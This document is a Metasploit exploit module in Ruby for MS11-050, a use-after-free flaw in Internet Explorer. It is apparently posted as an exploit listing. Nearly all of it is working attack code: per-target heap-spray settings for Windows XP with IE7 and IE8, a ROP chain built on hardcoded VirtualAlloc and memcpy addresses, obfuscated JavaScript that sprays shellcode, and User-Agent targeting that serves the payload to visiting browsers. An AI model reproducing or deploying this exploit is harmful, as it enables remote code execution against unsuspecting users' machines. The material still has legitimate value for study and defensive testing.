MS11-050 IE mshtml!CObjectElement Use After Free

`##  
# $Id: ms11_050_mshtml_cobjectelement.rb 12962 2011-06-17 01:56:20Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::IE,  
:ua_minver => "7.0",  
:ua_maxver => "8.0",  
:javascript => true,  
:os_name => OperatingSystems::WINDOWS,  
:vuln_test => nil,   
})  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",  
'Description' => %q{  
This module exploits a use-after-free vulnerability in Internet Explorer. The  
vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover  
where the object tag should be when rendered (due to their styles/positioning). The  
mshtml!CObjectElement is then freed from memory because it is invalid. However, the  
mshtml!CDisplay object for the page continues to keep a reference to the freed <object> and  
attempts to call a function on it, leading to the use-after-free.  
},  
'License' => MSF_LICENSE,  
'Version' => "$Revision: 12962 $",  
'Author' =>  
[  
'd0c_s4vage',  
],  
'References' =>  
[  
['CVE', '2011-1256'],  
['OSVDB', '72948'],  
['MSB', 'MS11-050'],  
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
'InitialAutoRunScript' => 'migrate -f',  
},  
'Payload' =>  
{  
'Space' => 500,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { } ],  
  
# In IE6 the mshtml!CObjectElement size is 0xac  
[  
'Win XP SP3 Internet Explorer 7', # 7.0.5730.13  
{  
# sizeof(mshtml!CObjectElement)  
'FreedObjSize' => 0xb0,  
'FakeObjCount' => 0x4000,  
'FakeObjCountKeep' => 0x2000,  
'ForLoopNumObjects' => 3,  
'FreedObjOverwritePointer'=>0x0c0c0c0c,  
'FreedObjOffsetAlignSize'=>0,  
'ROP' => false,  
}  
],  
  
[  
'Win XP SP3 Internet Explorer 8 (no DEP)', # 8.0.6001.18702  
{  
# sizeof(mshtml!CObjectElement)  
'FreedObjSize' => 0xe0, # 0xdc rounded up  
'FakeObjCount' => 0x8000,  
'FakeObjCountKeep' => 0x3000,  
'ForLoopNumObjects' => 5,  
'FreedObjOverwritePointer'=>0x0c0c0c0c,  
'FreedObjOffsetAlignSize'=>0,  
'ROP' => false,  
}  
],  
  
[  
'Win XP SP3 Internet Explorer 8',  
{  
'FreedObjSize' => 0xe0, # 0xdc rounded up  
'FakeObjCount' => 0x8000,  
'FakeObjCountKeep' => 0x3000,  
'ForLoopNumObjects' => 5,  
'FreedObjOverwritePointer'=>0x0c0c0c0c,  
'FreedObjOffsetAlignSize'=>2,  
#'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll  
'StackPivot' => 0x7E45F257, #xchg eax,esp - USER32.dll  
'ROP' => true,  
}  
],  
  
[  
'Debug Target (Crash)', {}  
],  
],  
'DisclosureDate' => "Jun 16 2011",  
'DefaultTarget' => 0))  
end  
  
def auto_target(cli, request)  
agent = request.headers['User-Agent']  
if agent =~ /MSIE 8\.0/  
mytarget = targets[3] # IE 8  
elsif agent =~ /MSIE 7\.0/  
mytarget = targets[1]  
else  
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")  
end  
  
mytarget  
end  
  
  
# 3/22/2011  
# fully patched x32 WinXP SP3, IE 8.0.6001.18702  
def winxp_sp3_rva  
{  
#"kernel32!VirtualAlloc" => 0x7c809af1,  
"kernel32!VirtualAlloc" => 0x7c809ae1,  
"ntdll!memcpy" => 0x7c901db3,  
}  
end  
  
def compile_rop(rop_stack)  
rva = winxp_sp3_rva()  
num_random = 0  
rop_stack.map do |rop_val|  
case rop_val  
when String  
if rop_val == "random"  
# useful for debugging  
# num_random += 1  
# 0xaabbcc00 + num_random  
rand(0xffffffff)  
else  
raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val]  
rva[rop_val]  
end  
when Integer  
rop_val  
else  
raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}"  
end  
end.pack("V*")  
end  
  
def on_request_uri(cli, request)  
mytarget = target  
if target.name == 'Automatic'  
mytarget = auto_target(cli, request)  
unless mytarget  
send_not_found(cli)  
return  
end  
end  
@mytarget = mytarget  
@debug = true if mytarget == targets[4]  
  
return if ((p = regenerate_payload(cli)) == nil)  
  
id_name = rand_text_alpha(5)  
dir_name = rand_text_alpha(3)  
  
if @debug  
data = <<-DATA  
<html>  
<body>  
<script language='javascript'>  
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'></object>";  
document.body.innerHTML += "<a id='#{id_name}' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' ></a>";  
document.body.innerHTML += "AAAAAAA";  
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='#{dir_name}'></strong>";  
</script>  
</body>  
</html>  
DATA  
  
print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")  
send_response(cli, data, { 'Content-Type' => 'text/html' })  
return  
end  
  
raw_shellcode = payload.encoded  
shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch))  
  
spray = nil  
rop_shellcode_spray = nil  
  
obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V")  
  
if @mytarget['ROP']  
rop_stack = []  
0x1f.times do |i|  
rop_stack << "random"  
end  
  
idx = -1  
idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc" # 1:  
idx += 1 ; rop_stack[idx] = "ntdll!memcpy" # 2:ret 10 to this after VirtualAlloc  
idx += 1 ; rop_stack[idx] = 0x7f000000 # 1:VirtualAlloc:lpAddress  
idx += 1 ; rop_stack[idx] = 0x4000 # 1:VirtualAlloc:dwSize  
idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000) # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE  
idx += 1 ; rop_stack[idx] = 0x40 # 1:VirtualAlloc:flProtect rwx  
idx += 1 ; rop_stack[idx] = 0x7f001000 # 3:into this after memcpy  
idx += 1 ; rop_stack[idx] = 0x7f001000 # 2:memcpy:dst  
idx += 1 ; rop_stack[idx] = 0x23000100 # 2:memcpy:src  
idx += 1 ; rop_stack[idx] = 0x2fff # 2:memcpy:size  
  
# align the rest of it  
back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length)  
rop_stack = back + rop_stack  
  
rop_stack << @mytarget['StackPivot']  
  
# align the stack for 0c0c0c0c  
front = rop_stack.slice!(0, 19)  
rop_stack = rop_stack + front  
  
# resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc)  
rop = compile_rop(rop_stack)  
  
nops = make_nops(0x1000 - raw_shellcode.length)  
nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch))  
  
#spray up to 0x23000000  
rop_shellcode_spray = <<-JS  
var shellcode = unescape("#{shellcode}");  
var nops = unescape("#{nops}");  
while(nops.length < 0x1000) nops += nops;  
var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode;  
while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock;  
var shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2);  
for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); }  
JS  
  
spray = rop  
shellcode = ""  
else  
spray = obj_overwrite_ptr  
end  
  
spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch))  
  
js = <<-JS  
heap_obj = new heapLib.ie(0x20000);  
var heapspray = unescape("#{spray}");  
while(heapspray.length < 0x1000) heapspray += heapspray;  
var shellcode = unescape("#{shellcode}");  
var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode;  
var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"};  
var front = heapblock.substring(0, offset);  
var end = heapblock.substring(offset);  
heapblock = end + front;  
while(heapblock.length < 0x20000) heapblock += heapblock;  
finalspray = heapblock.substring(0, (0x10000-6)/2);  
for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); }  
  
#{rop_shellcode_spray}  
  
var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}");  
while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; }  
obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2);  
  
for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) {  
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";  
}  
  
for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); }  
for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); }  
  
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";  
document.body.innerHTML += "AAAA";  
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";  
JS  
  
js = heaplib(js)  
js = ::Rex::Exploitation::JSObfu.new(js)  
js.obfuscate  
  
html = <<-HTML  
<html>  
<body>  
<script language='javascript'>  
#{js}  
</script>  
</body>  
</html>  
HTML  
  
print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")  
  
send_response(cli, html, {'Content-Type'=>'text/html'})  
end  
end  
`